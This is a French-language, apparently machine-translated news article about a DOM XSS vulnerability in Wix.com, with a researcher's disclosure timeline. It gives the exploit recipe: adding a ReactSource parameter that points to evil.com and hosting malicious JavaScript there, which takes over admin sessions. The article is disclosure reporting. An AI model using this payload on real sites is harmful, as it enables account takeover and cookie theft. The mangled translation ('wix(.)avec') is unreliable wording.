Accueil > Nouvelles Cyber > XSS Bug Found on Wix.com Platform, Construit sur Open-Source WordPress Bibliothèque
CYBER NOUVELLES

XSS Bug Trouvé sur la plate-forme Wix.com, Construit sur Open-Source WordPress Bibliothèque

vulnérabilité-stforum

Avez-vous entendu parler de wix(.)avec?

Wix.com est une plate-forme de développement web basé sur un nuage conçu pour les utilisateurs de construire des sites web HTML5 et sites mobiles grâce à l'utilisation de ligne glisser-déposer des outils de l'entreprise.

Malheureusement, un bug XSS grave a été découvert sur la plate-forme mettant en danger actuellement des millions de sites Web et les utilisateurs.

en relation: TeslaCrypt Propagation via Compromised WordPress Pages

Wix(.)com a un bug XSS grave, chercheur dit

Tel que rapporté par les chercheurs en sécurité, le service accueille des millions de sites Web avec 87 millions d'utilisateurs enregistrés. La partie effrayante est que tous les utilisateurs sont actuellement sujettes à cette vulnérabilité XSS. Ce dernier peut être déployé par des attaquants d'une manière de ver de prendre en charge les comptes d'administrateur. Une fois cela fait, les attaquants obtenir le plein contrôle sur les sites Web compromis.

La vulnérabilité XSS a été décrit par Matt Austin de sécurité de contraste. Il a écrit:

Wix.com a une vulnérabilité XSS DOM sévère qui permet un contrôle complet de l'attaquant sur un site Web hébergé chez Wix. Tout simplement en ajoutant un seul paramètre à tout site créé sur Wix, l'attaquant peut provoquer leur JavaScript doit être chargé et exécuté dans le cadre du site cible.

Une simple ligne de code suffit à déclencher le bug

L'attaque peut être déclenchée que par l'ajout d'une commande de redirection simple à une URL de wix(.)avec. Le résultat est redirigé vers JavaScrip malveillants. Voir un exemple ci-dessous:

  • Ajouter: ?ReactSource=https://evil.com à une URL pour un site créé sur wix.com.
  • Assurez-vous que evil.com héberge un fichier malveillant à /packages-bin/wixCodeInit/wixCodeInit.min.js

Ces simples lignes de code suffisent pour les attaquants afin d'être sûr que leur JS est chargé et activé dans le cadre du site Web ciblé, explique le chercheur. Les attaquants sont également en mesure d'accéder aux cookies et les ressources de la session admin, un très mauvais scénario bien. Chaque fois qu'un cookie de session est récolté, les attaquants peuvent librement positionner les DOM XSS dans un iframe. Ceci est fait pour héberger du contenu malveillant sur un site Web administré par un opérateur.

En cas de succès, cette attaque peut être mis à profit pour la distribution de logiciels malveillants, site modification, l'exploitation minière de crypto-monnaie, modifier les informations de compte, etc.

Qu'est-ce que Wix dit?

En ce qui concerne la communication avec wix(.)avec, les actions des chercheurs l'expérience suivante:

Octobre 10: Crée ticket de support demandant un contact de sécurité
Octobre 11: Tendez la main à @wix sur twitter pour trouver un contact de sécurité. Répondit utiliser support standard. Gave détails dans le billet créé. page Ticket ne fonctionne plus. https://www.wix.com/support/html5/contact.
Octobre 14: Reçu norme "Nous enquêtons sur la question et ferons un suivi le plus tôt possible" réponse de Wix.
Octobre 20: Répondre à un billet demandant une mise à jour. (pas de réponse)
Octobre 27: Deuxième demande d'une mise à jour. (pas de réponse)

Sur Octobre 28, le chercheur a finalement reçu un répondre qui a déclaré que le

groupe que vous avez essayé de contacter (sécurité) peut ne pas exister, ou vous ne pouvez pas avoir l'autorisation d'envoyer des messages au groupe.

Cependant, le PDG de Wix Avishai Abrahami a finalement admis que certains aspects de la plate-forme sont basés sur la bibliothèque open-source WordPress. Il affirme que tout ce qui a été amélioré a été libéré à la communauté, rapporte ZDNet.

Milena Dimitrova

Milena Dimitrova

Un écrivain et gestionnaire de contenu inspiré qui travaille avec SensorsTechForum depuis le début du projet. Un professionnel avec 10+ années d'expérience dans la création de contenu engageant. Axé sur la vie privée des utilisateurs et le développement des logiciels malveillants, elle croit fermement dans un monde où la cybersécurité joue un rôle central. Si le bon sens n'a pas de sens, elle sera là pour prendre des notes. Ces notes peuvent se tourner plus tard dans les articles! Suivre Milena @Milenyim

Plus de messages

Suivez-moi:
Gazouillement

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont marqués *

Délai est épuisé. S'il vous plaît recharger CAPTCHA.

Partager sur Facebook Partager
Loading ...
Partager sur Twitter Tweet
Loading ...
Partager sur Google Plus Partager
Loading ...
Partager sur Linkedin Partager
Loading ...
Partager sur Digg Partager
Partager sur Reddit Partager
Loading ...
Partager sur Stumbleupon Partager
Loading ...